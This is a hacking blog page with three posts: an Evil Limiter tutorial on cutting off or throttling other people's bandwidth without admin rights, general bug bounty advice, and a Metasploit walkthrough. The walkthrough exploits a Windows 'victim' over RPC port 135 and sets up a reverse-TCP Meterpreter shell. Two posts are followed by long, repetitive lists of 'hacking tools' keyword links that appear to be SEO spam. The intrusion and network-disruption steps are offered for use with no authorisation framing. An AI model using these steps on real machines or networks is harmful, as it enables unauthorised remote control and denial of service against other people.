Contador nichichanilimonada

martes, 30 de mayo de 2023

Evil Limiter: Taking Control Of Your Network Bandwidth







Ever wanted to block someone from the network or limit their bandwidth without having the network admin privileges? Well Evil Limiter has got you covered then.


An amazing tool to help you control your network without having access to the admin panel.

Today I'm gonna show you how to use this interesting tool to take control of your network.


Requirements:

1. A PC or Laptop with Linux OS.
2. A Network Adapter.
3. Access to the Network you want to control.
4. sudo or root access on your Linux OS.

First of all we will download the tool from its github repository:

https://github.com/bitbrute/evillimiter

You can download and extract the zip file from the link above or you can clone evillimiter repository using git like this:


git clone https://github.com/bitbrute/evillimiter 


Now lets install the downloaded tool on our machine

Step 1: Move inside the downloaded github repository

cd evillimiter


Step 2: To install type


sudo python3 setup.py install


wait for the installation to finish (May take some time)


Step 3: To run type


sudo evilimiter


Voila! That's it, you got it up and running on your machine


Now how do you control your network with it, its very easy.

It should detect your network automatically but yeah you can set it up manually as well using the command line argument -i.

After you have selected the right interface to control, you need to scan your network for live hosts. To perform the scan type


scan


you can pass an optional flag to the scan command which is range which will help you to specify the range of ip addresses you want to scan like this


scan --range 192.168.1.1-192.168.1.100





The above command will scan a total of 100 hosts from 192.168.1.1 to 192.168.1.100


Now after you have scanned your network next thing is to list the hosts that have been discovered during the scan for that you type the hosts command like this


hosts





Now you know the hosts on your network and now you should know which host you wanna block or limit based on the mac address of the host. Remember the host id of the host that you want to block or limit bandwidth of and lets do the magic.

to block a host from using the internet we simply specify the block command followed by the host id of the host that we want to block like this

block 1





if instead of blocking the host we just want to limit his internet bandwidth we can do just that by using the limit command followed by the host id and then the bandwidth that we want to allocate to that particular host like this


limit 1 100kbits





Wohooo! yeah its that easy and yes you can do all this without having the network admin role.

Now if you want to show mercy on that poor guy (blocked host), you can set him free by using the free command followed by the host id like this:

free 1





Well isn't administrating your network bandwidth so easy now.

Hope you enjoyed this tutorial.:)

Related links

  1. Hacking Tools For Windows Free Download
  2. Hack Apps
  3. Hacking Tools Hardware
  4. Pentest Tools Url Fuzzer
  5. Pentest Tools Windows
  6. Blackhat Hacker Tools
  7. Best Hacking Tools 2019
  8. Hacking Apps
  9. Hacker Tools Github
  10. Pentest Tools Tcp Port Scanner
  11. Hacking Tools For Kali Linux
  12. Hacking Tools For Games
  13. Physical Pentest Tools
  14. Hacking Tools For Pc
  15. Top Pentest Tools
  16. Hack Tool Apk No Root
  17. Beginner Hacker Tools
  18. Pentest Tools Nmap
  19. Hack Tools For Windows
  20. World No 1 Hacker Software
  21. Pentest Tools Port Scanner
  22. Hacker Tools For Pc
  23. Android Hack Tools Github
  24. Wifi Hacker Tools For Windows
  25. Pentest Tools Windows
  26. Hack Tool Apk
  27. Hack Tools For Games
  28. Termux Hacking Tools 2019
  29. Hacker Tools Free Download
  30. Github Hacking Tools
  31. Hacking Tools Pc
  32. Hacker Tools Free Download
  33. Hacking Tools Download
  34. Hacking Tools 2019
  35. Hacker Tools 2020
  36. Pentest Tools Find Subdomains
  37. Hack Tools For Pc
  38. Hack And Tools
  39. Pentest Tools Online
  40. Hacker Tools
  41. Hacker Tools
  42. Hack App
  43. Pentest Tools Apk
  44. Top Pentest Tools
  45. Tools For Hacker
  46. Pentest Tools Subdomain
  47. Install Pentest Tools Ubuntu
  48. Black Hat Hacker Tools
  49. Hacker Tools Mac
  50. Hack Tools Pc
  51. Hacker Tools For Pc
  52. Hacking Apps
  53. Hacker Tool Kit
  54. Hack Website Online Tool
  55. Kik Hack Tools
  56. Pentest Tools Subdomain
  57. Wifi Hacker Tools For Windows
  58. Hacking Tools And Software
  59. Pentest Automation Tools
  60. Best Pentesting Tools 2018
  61. Install Pentest Tools Ubuntu
  62. Hack Apps
  63. Hacking Tools Free Download
  64. Hacker Tools Free Download
  65. Pentest Tools
  66. Black Hat Hacker Tools
  67. Hacker
  68. How To Make Hacking Tools
  69. Hacking Tools Download
  70. Pentest Tools Linux
  71. Pentest Tools Apk
  72. Hacking Tools For Windows 7
  73. Hacking Tools For Windows 7
  74. Pentest Tools Free
  75. Pentest Reporting Tools
  76. Hacking Tools Free Download
  77. Hacking App
  78. Hack Tools For Pc
  79. Bluetooth Hacking Tools Kali
  80. What Is Hacking Tools
  81. Pentest Tools Kali Linux
  82. Top Pentest Tools
  83. Hacking Tools For Windows
  84. Pentest Tools Online
  85. Pentest Tools Bluekeep
  86. Hack Tools For Mac
  87. Hacking Tools Online
  88. Kik Hack Tools
  89. Hack Tools For Mac
  90. Hacking Apps
  91. Easy Hack Tools
  92. Pentest Tools Framework
  93. Blackhat Hacker Tools
  94. Hacker Tools Free
  95. Pentest Tools Website Vulnerability
  96. Hacking Tools Free Download
  97. Hack Tools Pc
  98. Hacking Tools Name
  99. Hack Tool Apk No Root
  100. Pentest Tools Github
  101. Pentest Tools For Ubuntu
  102. Pentest Box Tools Download
  103. Hack Tools For Mac
  104. Hak5 Tools
  105. Hacking Tools Name
  106. Hacker Tools Windows
  107. Hack Tools
  108. Github Hacking Tools
  109. Pentest Tools Free
  110. Pentest Tools List
  111. Hacker Tools Free
  112. Pentest Tools Url Fuzzer
  113. Hacking Tools For Kali Linux
  114. Easy Hack Tools
  115. Pentest Tools For Android
  116. Pentest Tools Find Subdomains
  117. Hack Tools Github
  118. Hack Tools For Windows
  119. Hacking Tools For Games
  120. Hack Tools For Mac
  121. Pentest Tools For Windows
  122. Hacker Tools For Mac
  123. Pentest Tools Bluekeep
  124. Hacking Tools Windows 10
  125. Best Hacking Tools 2019
  126. Hacker Tools For Pc
  127. Bluetooth Hacking Tools Kali
  128. Best Hacking Tools 2019
  129. Hacker Tools Online
  130. Hack And Tools
  131. Tools For Hacker
  132. Pentest Automation Tools
  133. Hack Tools For Pc
  134. What Are Hacking Tools
  135. Hack Tools Pc
  136. Free Pentest Tools For Windows

How Do I Get Started With Bug Bounty ?

How do I get started with bug bounty hunting? How do I improve my skills?



These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.
Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.

Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.


Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

More articles


  1. Underground Hacker Sites
  2. Hacking Tools Mac
  3. Hack Tools Github
  4. Underground Hacker Sites
  5. Hacking Tools For Games
  6. Pentest Tools Linux
  7. Termux Hacking Tools 2019
  8. Pentest Tools Framework
  9. Pentest Tools For Windows
  10. Pentest Tools Url Fuzzer
  11. Pentest Tools Website
  12. Pentest Tools For Mac
  13. Hacking Tools For Windows
  14. Hacker Tools Linux
  15. Hacking Tools 2020
  16. How To Hack
  17. Nsa Hacker Tools
  18. Pentest Tools Framework
  19. Hackers Toolbox
  20. Hacker Techniques Tools And Incident Handling
  21. Hacker Tools Free Download
  22. Install Pentest Tools Ubuntu
  23. Hack Tools For Pc
  24. Ethical Hacker Tools
  25. Termux Hacking Tools 2019
  26. Hacks And Tools
  27. Hacking Tools For Games
  28. Hack Tools For Ubuntu
  29. Hack Website Online Tool
  30. Nsa Hack Tools Download
  31. Best Pentesting Tools 2018
  32. Usb Pentest Tools
  33. Hacking Tools Kit
  34. Pentest Tools Find Subdomains
  35. Hacks And Tools
  36. Github Hacking Tools
  37. Hacking Tools For Beginners
  38. Black Hat Hacker Tools
  39. Growth Hacker Tools
  40. World No 1 Hacker Software
  41. Pentest Tools List
  42. Hacker Tools 2020
  43. Pentest Tools Website
  44. Pentest Tools Alternative
  45. New Hack Tools
  46. Hacking Tools For Mac
  47. Hacking Tools Pc
  48. Usb Pentest Tools
  49. Hackrf Tools
  50. Termux Hacking Tools 2019
  51. Hacker Tools Free Download
  52. Hack Tools Github
  53. Pentest Tools Free
  54. Hack Apps
  55. Hak5 Tools
  56. Hacker Tools Free Download
  57. Hacking Tools 2020
  58. Black Hat Hacker Tools
  59. Hack Tools
  60. Kik Hack Tools
  61. Hack Tools For Pc
  62. Hacker Tools Online
  63. Wifi Hacker Tools For Windows
  64. Hacker Tools For Windows
  65. Hacker Tools For Windows
  66. Hacking Tools For Windows Free Download
  67. Hacking Tools For Windows
  68. Hack Tools For Games
  69. Pentest Tools Kali Linux
  70. Hacking Tools Hardware
  71. Pentest Automation Tools
  72. Kik Hack Tools
  73. Hacker Tools Free
  74. Pentest Tools Website Vulnerability
  75. Pentest Tools Free
  76. Hacking Tools For Windows
  77. Pentest Tools Framework
  78. Hacker Tools Software
  79. Hacker Tools Windows
  80. Hacker Techniques Tools And Incident Handling
  81. Hacking Tools For Windows
  82. Hack Tools
  83. Hacking Tools Online
  84. Hacker Tools List
  85. Wifi Hacker Tools For Windows
  86. Pentest Tools For Windows

lunes, 29 de mayo de 2023

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

More info